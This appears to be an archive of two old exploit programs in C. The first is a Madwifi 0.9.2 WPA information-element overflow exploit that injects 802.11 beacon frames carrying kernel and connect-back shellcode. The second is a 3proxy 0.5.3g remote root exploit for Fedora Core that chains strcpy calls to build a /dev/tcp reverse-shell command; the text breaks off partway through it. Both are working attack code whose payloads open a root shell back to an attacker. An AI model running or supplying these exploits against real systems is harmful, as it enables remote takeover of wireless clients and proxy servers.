 * exploit code by:   sgrakkyu <at> antifork.org -- 10/1/2007
 * 
 * CVE: 2006-6332 (Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES)
 * 
 * (for wpa)
 * ....
 * memcpy(buf, se->se_wpa_ie, se->se_wpa_ie[1] + 2) 
 * ....
 * ....
 * the function re-uses args in the stack before returning so we 
 * can't trash them overwriting. 
 * Different compiled module [ex. different version of gcc] may require 
 * a different pad value.. (see -g option)
 *
 * ex:
 * on one terminal runs: nc -l -p 31337 
 * phi:~/kexec/lorcon# gcc -g -o madwifi_exp madwifi_exp.c -lorcon
 * phi:~/kexec/lorcon# wlanconfig ath1 create wlandev wifi0 wlanmode monitor
 * phi:~/kexec/lorcon# ifconfig ath1 up
 * phi:~/kexec/lorcon# ./madwifi_exp -i ath1 -d madwifing -a 10.0.0.1 -p 31337
 * [opt-ip]: 10.0.0.1
 * [opt-port]: 31337
 * [opt-iface]: ath1
 * [opt-driver]: madwifing
 * [opt-jump]: 0xffffe777
 * [pad]: 36
 *
 * [*][Low Avail Byte]: 103
 * [*][High Avail Byte]: 47
 * [*][u_code[] (high)size]: 91, [ring0_code[] (low)size]: 47
 * [*][ patching jump ]: [eba7]
 * [*][Payload space]: 192
 * [*][beacon_frame-80211]=54
 * [*][beacon_WPA_IE_lenght]: 198
 *
 * [printing frame - start]
 *   80 00 00 00 ff ff ff ff ff ff cc cc cc cc cc cc
 *   cc cc cc cc cc cc 00 00 00 00 00 00 00 00 00 00
 *   64 00 01 00 00 03 41 41 41 01 08 82 84 8b 96 0c
 *   18 30 48 03 01 0b dd c6 00 50 f2 01 01 00 90 90
 *   90 90 90 90 90 90 90 90 90 90 31 c0 89 c3 40 40
 *   ....
 *   ....
 *
 *
 * Tuning option:
 * - depending on gcc version/optimization we have to change the padding of vector
 *   payload, take a look to the following disassembly of the module wlan.o compiled
 *   with gcc-4.0 (kernel compiled for i586):
 *
 *  00015a49 <giwscan_cb>:
 *  15a49:       55                      push   %ebp
 *  15a4a:       57                      push   %edi
 *  15a4b:       56                      push   %esi
 *  15a4c:       53                      push   %ebx
 *  15a4d:       81 ec c4 00 00 00       sub    $0xbc,%esp <--16+188=[204]
 *  .........
 *  .........
 *  .........
 *  15fc3:       8d 54 24 12             lea    0xa(%esp),%edx <-esp+[10]
 *  15fc7:       89 d7                   mov    %edx,%edi
 *  ...
 *  ...
 *  15fd5:       f3 a5                   rep movsl %ds:(%esi),%es:(%edi)
 *     
 * 
 * this is not a rule, check gcc generated code to calculate correct pad value :
 * [startbuf-ret] = (16 + 188 - 10) = 194 byte
 * PAD = 194 - SHELLCODE_SPACE - IEWPAheader(code,len,oui) = 194 - 150 - 8 = 36
 * ( -g 36 would be the choice in that case)
 *   
 *   NOTE: 1) the remote box must call the ioctl() SIOCGIWSCAN
 *            for ex. when the iface gets up or during iwlist iface scanning
 *            command
 *
 *         2) if you need more space for kernel mode code you can rely on
 *             struct ieee80211_scan_entry parameter of giwscan_cb()
 *             function to access the real frame (a trivial joke)
 *
 *         3) i had no time to test this exploit on other boxes..:
 *            tested only on:  Slackware 10 -  madwifi 0.9.2
 *                             Kubuntu - kernel 2.6.17 - madwifi 0.9.2
 *
 *
 *  TNX TNX TNX  twiz <at> antifork.org
 */


#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <getopt.h>
#include <netinet/in.h>
#include <sys/socket.h>

#include <tx80211.h>
#include <tx80211_packet.h>
#include <linux/wireless.h>
#include <arpa/inet.h>


/* 2.6.17 VSYSCALL: for >= 2.6.18 without fixed-vsyscall entry use kernel hardcoded value */
#define VSYSCALL_JMP_ESP_OFFSET   0xffffe777
#define IE_ZERO 0x00000000

#define FIX_BYTE(base,offset,byte)   *(((unsigned char*)base) + offset) = byte;
#define FIX_WORD(base,offset,word)   *((unsigned short *)((unsigned char*)base + offset)) = word;
#define FIX_DWORD(base,offset,dword) *((unsigned int *)((unsigned char*)base + offset)) = dword;

/* shellcode max buffer */
/* 8 bytes used for length + oui */
#define SHELLCODE_SPACE  150  
#define PAD_SPACE        36

#define PAYLOAD_SPACE    (SHELLCODE_SPACE + pad_space + 4 + 2)
#define TOTAL_PACKET_LEN (sizeof(beacon_80211_wpa) -1 + PAYLOAD_SPACE)

/* exp option */
/* Filled in by parse_arg(); main() refuses to run unless iface, driver, ip
 * and port are all set. jmp_address and pad_space keep their compile-time
 * defaults unless -j / -g are given. */
char *iface = NULL;  /* needed */
char *driver = NULL; /* needed */
char *ip = NULL;     /* needed */
short port = 0;      /* needed */
unsigned int jmp_address = VSYSCALL_JMP_ESP_OFFSET;
unsigned int pad_space = PAD_SPACE;



/* ----------------------------------- */

#define SUB_OFFSET_PATCH 8
/* Raw bytes copied into the frame right after u_code by build_frame();
 * the immediate of the "sub" instruction at SUB_OFFSET_PATCH is rewritten
 * there, so this array is modified in place at run time. */
char ring0_code[]=
 "\xe8\x00\x00\x00\x00"      //call   8048359 <main+0x21>
 "\x5e"                      //pop    %esi
 "\x81\xee\x88\x00\x00\x00"  //sub    $0x88,%esi  /* PATCH */
 "\x31\xc0"                  //xor    %eax,%eax
 "\xb0\x04"                  //mov    $0x4,%al
 "\x01\xc4"                  //add    %eax,%esp
 "\x83\x3c\x24\x73"          //cmp    $0x73,%esp
 "\x75\xf8"                  //jne    8048364 <main+0x2c>
 "\x83\x7c\x24\x0c\x7b"      //cmpl   $0x7b,0xc(%esp)
 "\x75\xf1"                  //jne    8048364 <main+0x2c>
 "\x29\xc4"                  //sub    %eax,%esp
 "\x8b\x7c\x24\x0c"          //mov    0xc(%esp),%edi
 "\x89\x3c\x24"              //mov    %edi,(%esp)
 "\x31\xc9"                  //xor    %ecx,%ecx
 "\xb1\x5b"                  //mov    $0x5b,%cl /* FIX */
 "\xf3\xa4"                  //rep movsb %ds:(%esi),%es:(%edi)
 "\xcf";                     //iret


/* connect back */
#define IP_OFFSET   35
#define PORT_OFFSET 44
/* Raw bytes copied into the frame by build_frame(); the 4 bytes at
 * IP_OFFSET and the 2 bytes at PORT_OFFSET are overwritten in place by
 * parse_arg() from the -a and -p options. */
char u_code[] = 
"\x31\xc0\x89\xc3\x40\x40\xcd\x80\x39\xc3\x74\x03\x31\xc0\x40\xcd\x80" /* fork */
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5d"              
"\xbe"
"\xf5\xff\xff\xfe"  // ~ip
"\xf7\xd6\x56\x66\xbd"
"\x69\x7a"          // port
"\x0f\xcd\x09\xdd\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"   
"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68"  
"\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";         


/* 802.11header + WPA IE prolog */
#define WPA_LEN_OFFSET 55
#define CHANNEL     11
/* Static 802.11 beacon header plus the start of the WPA information
 * element. build_frame() copies it first (minus the terminating NUL) and
 * rewrites the IE length byte at WPA_LEN_OFFSET in place beforehand. */
char beacon_80211_wpa[] = 
"\x80"              // management frame / subtype beacon
"\x00"              // flags
"\x00\x00"          // duration
"\xFF\xFF\xFF\xFF\xFF\xFF"  // destination addr
"\xCC\xCC\xCC\xCC\xCC\xCC"  // src address
"\xCC\xCC\xCC\xCC\xCC\xCC"  // bbsid
"\x00\x00"          // seq
"\x00\x00\x00\x00\x00\x00\x00\x00" // timestamp
"\x64\x00"          // interval
"\x01\x00"          // caps
"\x00\x03\x41\x41\x41"  // ssid Information Element
"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" // rates Information Element
"\x03\x01\x0B"     // channel Information Element (11)
"\xdd\xc6"         // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */
"\x00\x50\xf2\x01\x01\x00";     // oui + type + version (first 6 byte of len)

#define JUMP_OFFSET_PATCH 1
/* Two-byte short jump appended last by build_frame(); the displacement byte
 * at JUMP_OFFSET_PATCH is computed and written there. */
char jmp_back[]="\xeb\x00";

/* ----------------------------------- */


/* Print the one-line option summary for the given program name. */
void usage(char *prog)
{
  fprintf(stdout,
          "[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\n",
          prog);
}

unsigned char *build_frame()
{
  /*
   * Assembles the frame in a freshly malloc'd buffer of TOTAL_PACKET_LEN
   * bytes, in this order:
   *   beacon_80211_wpa | 0x90 filler | u_code | ring0_code |
   *   pad_space bytes of 4-byte counters | jmp_address | jmp_back
   * Before copying it patches, in place, the jmp_back displacement, the
   * ring0_code "sub" immediate and the WPA IE length byte of the
   * file-scope arrays.
   * Returns the buffer; the caller owns it (main() never frees it).
   * NOTE(review): malloc() is not checked; sizeof() values are printed with
   * %d (size_t vs int); b is evaluated in unsigned arithmetic because
   * pad_space is unsigned, then truncated to one byte by FIX_BYTE; j is
   * unused.
   */
  int i,j;
  char *frame = malloc(TOTAL_PACKET_LEN);
  char *ptr = frame;
  
  /* hsb: bytes of ring0_code; lsb: what is left of SHELLCODE_SPACE for
     the filler plus u_code */
  unsigned int hsb = sizeof(ring0_code)-1;
  unsigned int lsb =  SHELLCODE_SPACE - hsb;
  printf("[*][low-kcode]: %d\n[*][high-ucode]: %d\n", 
         lsb, hsb);
  
  printf("[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\n", 
         sizeof(u_code)-1, sizeof(ring0_code)-1);

  /* fix jump */
  int b = -4 - pad_space - (sizeof(jmp_back)-1) - (sizeof(ring0_code)-1);
  FIX_BYTE(jmp_back, JUMP_OFFSET_PATCH, b);

  /* fix ring0_code/u_code displacement */
  unsigned int sub = 5 + (sizeof(u_code)-1);
  FIX_BYTE(ring0_code, SUB_OFFSET_PATCH, sub);

  printf("[*][payload space]: %d\n", PAYLOAD_SPACE);

  /* fix beacon_80211_wpa: WPA len */
  FIX_BYTE(beacon_80211_wpa, WPA_LEN_OFFSET, PAYLOAD_SPACE + 6);
  printf("[*][beacon_WPA_IE_lenght]: %u\n", 
                  (unsigned char)beacon_80211_wpa[WPA_LEN_OFFSET]);

  /* fill frame */
  memset(frame, 0x00, TOTAL_PACKET_LEN);

  memcpy(ptr, beacon_80211_wpa, sizeof(beacon_80211_wpa)-1);
  ptr += (sizeof(beacon_80211_wpa)-1);

  /* filler sized so that filler + u_code == lsb */
  memset(ptr, 0x90, lsb - (sizeof(u_code)-1));
  ptr += (lsb - (sizeof(u_code)-1));
  
  memcpy(ptr, u_code, sizeof(u_code) -1);
  ptr += (sizeof(u_code) -1);

  memcpy(ptr, ring0_code, sizeof(ring0_code)-1);
  ptr += sizeof(ring0_code)-1;
  
  /* pad words 0,1,2,... (unaligned 4-byte stores; i < pad_space compares
     int against unsigned) */
  for(i=0; i<pad_space; i+=4) 
    *((unsigned int *)(ptr + i)) = (IE_ZERO+(i/4));

  ptr += pad_space;

  *((unsigned int *)(ptr)) = jmp_address;
  ptr += 4;

  memcpy(ptr, jmp_back, sizeof(jmp_back)-1);
  ptr += sizeof(jmp_back)-1;

  return (unsigned char*)frame; 
}

/* Hex-dump `size` bytes of `frame` to stdout, 16 bytes per line, framed by
 * start/end marker lines. Output is byte-for-byte the same as before. */
void print_frame(unsigned char *frame, unsigned int size)
{
  unsigned int idx;
  printf("\n[printing frame - start]\n  ");
  for(idx = 0; idx < size; idx++)
  {
    printf("%02x ", frame[idx]);
    /* break the line after every 16th byte */
    if(((idx + 1) % 16) == 0)
      printf("\n  ");
  }
  printf("\n[printing frame - end]\n");
}

void parse_arg(int argc, char **argv)
{
  /*
   * Fills the file-scope option globals from argv via getopt().
   *   -j  jump address in hex (replaces the VSYSCALL default)
   *   -a  connect-back IP; its bitwise NOT is stored into u_code at IP_OFFSET
   *   -p  connect-back port; stored as a 2-byte value into u_code at PORT_OFFSET
   *   -d  driver name, -i interface name (strdup'd, never freed)
   *   -g  pad size overriding PAD_SPACE
   * Any other option prints usage and exits with status 1.
   * NOTE(review): inet_aton()'s result is not checked, so an unparsable -a
   * leaves `in` uninitialized when it is read; strtoll() is narrowed to
   * unsigned int; atoi() does no range checking.
   */
  int opt;
  struct in_addr in;
  while( (opt=getopt(argc, argv, "j:i:a:p:d:g:")) != EOF)
  {
    switch(opt)
    {
      case 'j':
        jmp_address = strtoll(optarg, NULL, 16);
        break;
      case 'a':
        ip = strdup(optarg);
        inet_aton(ip, &in); 
        /* writes the complemented address in place (4 unaligned bytes) */
        FIX_DWORD(u_code, IP_OFFSET, ~(in.s_addr));    
        break;
      case 'p':
        port = atoi(optarg);
        FIX_WORD(u_code, PORT_OFFSET, port); 
        break;
      case 'd':
        driver = strdup(optarg);
        break;
      case 'i':
        iface = strdup(optarg);
        break;
      case 'g':
        pad_space = atoi(optarg);
        break;
      default:
        usage(argv[0]);
        exit(1);
    } 
  }
}


int main(int argc, char *argv[])
{
  /*
   * Entry point: parses options, requires -i/-d/-a/-p, prints the banner,
   * builds and hex-dumps the frame, then opens the interface through the
   * tx80211 (lorcon) API and transmits the same frame 10000 times with a
   * 100 ms sleep between sends.
   * Returns 0 on completion, -1 for driver-lookup/init errors and 1 for
   * channel/open/transmit errors; exit(1) on missing options.
   * NOTE(review): the init error message prints argv[1] instead of iface;
   * the buffer from build_frame() is never freed; the early returns skip
   * tx80211_close().
   */
  int i=0;
  struct tx80211 in_tx;
  struct tx80211_packet in_packet;
  int drivertype;
  
  parse_arg(argc, argv);                

  if(!iface || !driver || !ip || !port)
  {
    usage(argv[0]);
    exit(1);
  }

  printf( "\n\nMadwifi 0.9.2 WPA/RSN IE buffer overflow\n\t exploit code: sgrakkyu <at> antifork.org\n"
          "-------------------- **** ------------------\n"
          "[opt-ip]: %s\n[opt-port]: %d\n[opt-iface]: %s\n[opt-driver]: %s\n[opt-jump]: 0x%08x\n[pad]: %d\n"
          "-------------------- **** ------------------\n\n",
          ip, port, iface, driver, jmp_address, pad_space);

  unsigned char *frame = build_frame();
  print_frame(frame, TOTAL_PACKET_LEN);

  /* Use the command-line argument as the desired driver type */
  drivertype = tx80211_resolvecard(driver);

  /* Validate the driver name specified */
  if (drivertype == INJ_NODRIVER) 
  {
    fprintf(stderr, "Driver name not recognized.\n");
    return -1;
  }

  /* the message below names argv[1], which is the first raw option
     token, not the interface passed to tx80211_init() */
  if (tx80211_init(&in_tx, iface, drivertype) < 0) {
    fprintf(stderr, "Error initializing drive \"%s\".\n", argv[1]);
    return -1;
  }

  if ((tx80211_getcapabilities(&in_tx) & TX80211_CAP_CTRL) == 0) 
  {
    fprintf(stderr, "Driver does not support transmitting control frames.\n");
    return -1;
  }

  if (tx80211_setchannel(&in_tx, CHANNEL) < 0) 
  {
    fprintf(stderr, "Error setting channel.\n");
    return 1;
  }

  if (tx80211_open(&in_tx) < 0) 
  {
    fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname);
    return 1;
  }

  /* Initialized in_packet with packet contents and length of the packet */
  in_packet.packet = frame;
  in_packet.plen = TOTAL_PACKET_LEN;

  printf("[sending packets]: about 10 a second\n");

  /* 10000 iterations x 100 ms == roughly 1000 s of continuous sending */
  while(i < 10000)
  {
    /* Transmit the packet */
    if (tx80211_txpacket(&in_tx, &in_packet) < 0) 
    {
      fprintf(stderr, "Unable to transmit packet.\n");
      perror("txpacket");
      return 1;
    }
    i++;
    usleep(100000);
  }
  /* Close the socket after transmitting the packet */
  tx80211_close(&in_tx);

  return 0;
}

// milw0rm.com [2007-03-01]


Xpl017Elz/3proxy 0.5.3g proxy.c logurl() Remote Overflow Exploit (exec-shield) ( linux)

/*
**
** Fedora Core 5,6 (exec-shield) based
** 3proxy HTTP Proxy (3proxy-0.5.3g.tgz) remote overflow root exploit
** (reverse connect-back method) by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: http://www.securityfocus.com/bid/23545
** vendor: http://3proxy.ru/
**
** vade79/v9 v9@fakehalo.us (fakehalo/realhalo)'s exploit:
** http://www.milw0rm.com/exploits/3821 (x3proxy.c)
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** It is a relatively easy exploit case.
** It doesn't need any exec family functions or manipulating address of 
** system() function, popen() function. 
**
** It just needs simple set of strings to make a connect-back shell.
** for some hosts that don't have netcat, we organize attack code like this.
**
** --
** (gdb) x/s 0x08051e5c
** 0x8051e5c:       "sh</dev/tcp/8282828282/56789>/dev/tcp/8282828282/5678"
** (gdb)
** --
**
** Open port 56789 on the attacker's server; when the attack succeeds,
** the hacker can SEND a COMMAND through that port.
**
** --
** $ nc -l -p 56789
** --
**
** Now open another port (this time 5678) on the attacker's server; when
** the attack succeeds, the hacker can GET the RESULT through that port.
**
** --
** $ nc -l -p 5678
** --
**
** It's very simple and easy!
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

/*
** Fedora Core release 6 (Zod)
** 2.6.18-1.2798.fc6 #1
** locale (GNU libc) 2.5
** gcc version 4.1.1 20061011 (Red Hat 4.1.1-30)
** 3proxy HTTP Proxy 0.5.3g tarball src compile (3proxy-0.5.3g.tgz)
*/
#define FC6_STRCPY_PLT		0x08048e3c // <strcpy@plt>
#define FC6_MOVE_ESP		0x0804f7c5 // <__do_global_ctors_aux> epilogue

#define FC6_CMD_LOC		0x08051e5c
#define FC6_NULL_STR		0x08051e4c // 0x00000000

#define FC6_NUM			0x08050d74 // "0"
#define FC6_SH_STR		0x08048703 // "fflush"
#define FC6_REDIR_1		0x080481ec // "<\0"
#define FC6_REDIR_2		0x0804e49b // ">\0"
#define FC6_SLASH_STR		0x08050d7f // "/\0"
#define FC6_DEV_STR1		0x08050d5d // "de"
#define FC6_DEV_STR2		0x08050d6f // "v"
#define FC6_TCP_STR1		0x0805065f // "/t"
#define FC6_TCP_STR2		0x08048709 // "strcpy"
#define FC6_PORT_56789		0x08050d79 // "56789+/"

#define FC6_SYSTEM_PLT		0x08048cbc // <system@plt>

/*
** Fedora Core release 5 (Bordeaux)
** 2.6.15-1.2054_FC5 #1
** locale (GNU libc) 2.4
** gcc version 4.1.0 20060304 (Red Hat 4.1.0-3)
** 3proxy HTTP Proxy 0.5.3g tarball src compile (3proxy-0.5.3g.tgz)
*/
#define FC5_STRCPY_PLT		0x08049194 // <strcpy@plt>
#define FC5_MOVE_ESP		0x0804f9a6 // <__do_global_ctors_aux> epilogue

#define FC5_CMD_LOC		0x08051e5c
#define FC5_NULL_STR		0x08051e4c // 0x00000000

#define FC5_NUM			0x08050f54 // "0"
#define FC5_SH_STR		0x08048938 // "fflush"
#define FC5_REDIR_1		0x080495bc // "<\0"
#define FC5_REDIR_2		0x0804e68b // ">\0"
#define FC5_SLASH_STR		0x08049ec3 // "/\0"
#define FC5_DEV_STR1		0x08050f3d // "de"
#define FC5_DEV_STR2		0x08050f4f // "v"
#define FC5_TCP_STR1		0x0805083b // "/t"
#define FC5_TCP_STR2		0x080488e4 // "strcpy"
#define FC5_PORT_56789		0x08050f59 // "56789+/"

#define FC5_SYSTEM_PLT		0x08048ed4 // <system@plt>

int main(int argc,char *argv[]){
	/*
	** Builds one oversized "GET /" request and sends it to argv[1]:argv[2].
	** argv[3] is the attacker IP; argv[4] selects the address set
	** (non-zero: the FC6 #defines, zero: the FC5 #defines).
	** do_ex layout: "GET /" + (1800-444) 'A' bytes; then, starting at the
	** offset left in i, groups of four 4-byte values (strcpy@plt, the
	** stack-adjust gadget, destination, source) that assemble the command
	** string shown in the header comment at cmd_loc one fragment at a
	** time; then system@plt with cmd_loc as its argument; then "\nHost: ",
	** 700 'A' bytes and a blank line.
	** Returns -1 on resolver/socket/connect failure, exit(-1) on bad usage,
	** exit(0) after the request is sent.
	** NOTE(review): the line `ip=ip1=ip2=ip3=ip4;` reads ip4 before anything
	** assigns it (undefined behaviour; sscanf() overwrites all four later);
	** sscanf() uses %d with u_long pointers; send() is unchecked; the macro
	** name __GOGOSSING is in the implementation-reserved namespace.
	*/
	u_long strcpy_plt;
	u_long move_esp;
	u_long cmd_loc;
	u_long null_str;
	u_long num;
	u_long sh_str;
	u_long redir_1;
	u_long redir_2;
	u_long slash_str;
	u_long dev_str1;
	u_long dev_str2;
	u_long tcp_str1;
	u_long tcp_str2;
	u_long port_56789;
	u_long system_plt;

	struct hostent *se;
	struct sockaddr_in saddr;
	unsigned char do_ex[4096];
	int i,l,sock;
	u_long ip,ip1,ip2,ip3,ip4;
	unsigned char attacker_ip[256];
	char host[256];
	int port=3128;

	ip=ip1=ip2=ip3=ip4;
	memset((char *)do_ex,0,sizeof(do_ex));

	printf("/*\n**\n** Fedora Core 5,6 (exec-shield) based\n"
		"** 3proxy HTTP Proxy (3proxy-0.5.3g.tgz) remote overflow root exploit\n"
		"** by Xpl017Elz\n**\n");
	if(argc<5){
		printf("** Usage: %s [host] [port] [attacker ip] [type]\n",argv[0]);
		printf("**\n** host: 3proxy HTTP Proxy server\n");
		printf("** port: default 3128\n");
		printf("** attacker ip: attacker netcat host\n");
		printf("** type: {0} - Fedora Core release 5 (Bordeaux), exec-shield default enabled.\n");
		printf("**       {1} - Fedora Core release 6 (Zod), exec-shield default enabled.\n**\n");
		printf("** Example: %s 3proxy.use_host.co.kr 3128 82.82.82.82 1\n**\n*/\n",argv[0]);
		exit(-1);
	}
	/* pick the per-build address set; any non-zero type means FC6 */
	if(atoi(argv[4])){
		strcpy_plt=FC6_STRCPY_PLT;
		move_esp=FC6_MOVE_ESP;
		cmd_loc=FC6_CMD_LOC;
		null_str=FC6_NULL_STR;
		num=FC6_NUM;
		sh_str=FC6_SH_STR;
		redir_1=FC6_REDIR_1;
		redir_2=FC6_REDIR_2;
		slash_str=FC6_SLASH_STR;
		dev_str1=FC6_DEV_STR1;
		dev_str2=FC6_DEV_STR2;
		tcp_str1=FC6_TCP_STR1;
		tcp_str2=FC6_TCP_STR2;
		port_56789=FC6_PORT_56789;
		system_plt=FC6_SYSTEM_PLT;
	} else {
		strcpy_plt=FC5_STRCPY_PLT;
		move_esp=FC5_MOVE_ESP;
		cmd_loc=FC5_CMD_LOC;
		null_str=FC5_NULL_STR;
		num=FC5_NUM;
		sh_str=FC5_SH_STR;
		redir_1=FC5_REDIR_1;
		redir_2=FC5_REDIR_2;
		slash_str=FC5_SLASH_STR;
		dev_str1=FC5_DEV_STR1;
		dev_str2=FC5_DEV_STR2;
		tcp_str1=FC5_TCP_STR1;
		tcp_str2=FC5_TCP_STR2;
		port_56789=FC5_PORT_56789;
		system_plt=FC5_SYSTEM_PLT;
	}

	/* dotted quad -> single 32-bit number, later written out in decimal so
	   that only digit characters are needed in the command string */
	sscanf(argv[3],"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4);
#define IP1 16777216
#define IP2 65536
#define IP3 256
	ip=0;
	ip+=ip1 * (IP1);
	ip+=ip2 * (IP2);
	ip+=ip3 * (IP3);
	ip+=ip4;

	memset((char *)attacker_ip,0,256);
	/* decimal form in a 10-wide field; the loop further down reads
	   exactly 10 characters of it */
	sprintf(attacker_ip,"%10lu",ip);

	memset((char *)host,0,sizeof(host));
	strncpy(host,argv[1],sizeof(host)-1);
	port=atoi(argv[2]);
	
	se=gethostbyname(host);
	if(se==NULL){
		printf("** gethostbyname() error\n**\n*/\n");
		return -1;
	}
	sock=socket(AF_INET,SOCK_STREAM,0);
	if(sock==-1){
		printf("** socket() error\n**\n*/\n");
		return -1;
	}

	saddr.sin_family=AF_INET;
	saddr.sin_port=htons(port);
	saddr.sin_addr=*((struct in_addr *)se->h_addr);
	bzero(&(saddr.sin_zero),8);

	printf("** make exploit\n");
	sprintf(do_ex,"GET /");
	l=strlen(do_ex);
	/* after this loop i == 1800-444 and l == 5 + that; i becomes the
	   write cursor for the values below */
	for(i=0;i<1800-444;i++,l++){
		sprintf(do_ex+l,"A");
	}

/* store a 4-byte value at dest[index] and advance index; the store is
   unaligned and type-punned through long, which i386 tolerates */
#define __GOGOSSING(dest,index,src){\
	*(long *)&dest[index]=src;\
	index+=4;\
}

	/* from here l is reused as the byte offset inside the command string
	   being assembled at cmd_loc, and each comment names the fragment
	   the previous group copies */
	l=0;
	__GOGOSSING(do_ex,i,move_esp); /* 0x0d filter */
	__GOGOSSING(do_ex,i,0x0d0d0d0d);
	__GOGOSSING(do_ex,i,0x0d0d0d0d);

	__GOGOSSING(do_ex,i,strcpy_plt);
	__GOGOSSING(do_ex,i,move_esp);
	__GOGOSSING(do_ex,i,cmd_loc+l);
	__GOGOSSING(do_ex,i,sh_str);
	l+=2; /* "sh" */
	__GOGOSSING(do_ex,i,strcpy_plt);
	__GOGOSSING(do_ex,i,move_esp);
	__GOGOSSING(do_ex,i,cmd_loc+l);
	__GOGOSSING(do_ex,i,redir_1);
	l+=1; /* ">" */
	__GOGOSSING(do_ex,i,strcpy_plt);
	__GOGOSSING(do_ex,i,move_esp);
	__GOGOSSING(do_ex,i,cmd_loc+l);
	__GOGOSSING(do_ex,i,slash_str);
	l+=1; /* "/" */
	__GOGOSSING(do_ex,i,strcpy_plt);
	__GOGOSSING(do_ex,i,move_esp);
	__GOGOSSING(do_ex,i,cmd_loc+l);
	__GOGOSSING(do_ex,i,dev_str1);
	l+=2; /* "de" */
	__GOGOSSING(do_ex,i,strcpy_plt);
	__GOGOSSING(do_ex,i,move_esp);
	__GOGOSSING(do_ex,i,cmd_loc+l);
	__GOGOSSING(do_ex,i,dev_str2);
	l+=1; /* "v" */
	__GOGOSSING(do_ex,i,strcpy_plt);
	__GOGOSSING(do_ex,i,move_esp);
	__GOGOSSING(do_ex,i,cmd_loc+l);
	__GOGOSSING(do_ex,i,tcp_str1);
	l+=2; /* "/t" */
	__GOGOSSING(do_ex,i,strcpy_plt);
	__GOGOSSING(do_ex,i,move_esp);
	__GOGOSSING(do_ex,i,cmd_loc+l);
	__GOGOSSING(do_ex,i,tcp_str2);
	l+=2; /* "cp" */
	__GOGOSSING(do_ex,i,strcpy_plt);
	__GOGOSSING(do_ex,i,move_esp);
	__GOGOSSING(do_ex,i,cmd_loc+l);
	__GOGOSSING(do_ex,i,slash_str);
	l+=1; /* "/" */

	/* IP address part */
	/* one group per character of attacker_ip, sourcing num+digit;
	   the switch has cases for '0'..'9' only, l advances regardless */
	for(ip=0;ip<10;ip++){
		__GOGOSSING(do_ex,i,strcpy_plt);
		__GOGOSSING(do_ex,i,move_esp);
		__GOGOSSING(do_ex,i,cmd_loc+l);
		
		switch(attacker_ip[ip]){
			case '0':
				__GOGOSSING(do_ex,i,num);
				break;
			case '1':
				__GOGOSSING(do_ex,i,num+1);
				break;
			case '2':
				__GOGOSSING(do_ex,i,num+2);
				break;
			case '3':
				__GOGOSSING(do_ex,i,num+3);
				break;
			case '4':
				__GOGOSSING(do_ex,i,num+4);
				break;
			case '5':
				__GOGOSSING(do_ex,i,num+5);
				break;
			case '6':
				__GOGOSSING(do_ex,i,num+6);
				break;
			case '7':
				__GOGOSSING(do_ex,i,num+7);
				break;
			case '8':
				__GOGOSSING(do_ex,i,num+8);
				break;
			case '9':
				__GOGOSSING(do_ex,i,num+9);
				break;
		}
		l+=1;
	}
	__GOGOSSING(do_ex,i,strcpy_plt);
	__GOGOSSING(do_ex,i,move_esp);
	__GOGOSSING(do_ex,i,cmd_loc+l);
	__GOGOSSING(do_ex,i,slash_str);
	l+=1; /* "/" */
	__GOGOSSING(do_ex,i,strcpy_plt);
	__GOGOSSING(do_ex,i,move_esp);
	__GOGOSSING(do_ex,i,cmd_loc+l);
	__GOGOSSING(do_ex,i,port_56789);
	l+=5; /* "56789" */
	__GOGOSSING(do_ex,i,strcpy_plt);
	__GOGOSSING(do_ex,i,move_esp);
	__GOGOSSING(do_ex,i,cmd_loc+l);
	__GOGOSSING(do_ex,i,redir_2);
	l+=1; /* ">" */
	
	__GOGOSSING(do_ex,i,strcpy_plt);
	__GOGOSSING(do_ex,i,move_esp);
	__GOGOSSING(do_ex,i,cmd_loc+l);
	__GOGOSSING(do_ex,i,null_str);
	/* null */
	/* stash the text from cmd_loc+3 at null_str-40, then copy it back
	   after the second '>' so the path repeats without re-spelling it */
	__GOGOSSING(do_ex,i,strcpy_plt);
	__GOGOSSING(do_ex,i,move_esp);
	__GOGOSSING(do_ex,i,null_str-40);
	__GOGOSSING(do_ex,i,cmd_loc+3);
	/* copy, "/dev/tcp/ip_addr/port" */
	
	__GOGOSSING(do_ex,i,strcpy_plt);
	__GOGOSSING(do_ex,i,move_esp);
	__GOGOSSING(do_ex,i,cmd_loc+l);
	__GOGOSSING(do_ex,i,null_str-40);
	l+=24; /* "/dev/tcp/ip_addr/port" */

	__GOGOSSING(do_ex,i,strcpy_plt);
	__GOGOSSING(do_ex,i,move_esp);
	__GOGOSSING(do_ex,i,cmd_loc+l);
	__GOGOSSING(do_ex,i,null_str); /* port number: 5678 */

	/* system() plt */
	__GOGOSSING(do_ex,i,system_plt);
	__GOGOSSING(do_ex,i,0x82828282);
	__GOGOSSING(do_ex,i,cmd_loc);

	/* trailing request header; i is recomputed with strlen(), so a NUL
	   among the values above would shorten what gets sent */
	sprintf(do_ex+i,"\nHost: ");
	i=strlen(do_ex);
	for(l=0;l<700;l++){
		do_ex[i++]='A';
	}
	do_ex[i++]='\n';
	do_ex[i++]='\n';
	printf("** total packet size: %d\n",strlen(do_ex));

	l=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));
	if(l==-1){
		printf("** connect() error\n**\n*/\n");
		return -1;
	}
	else {
		printf("** send exploit\n");
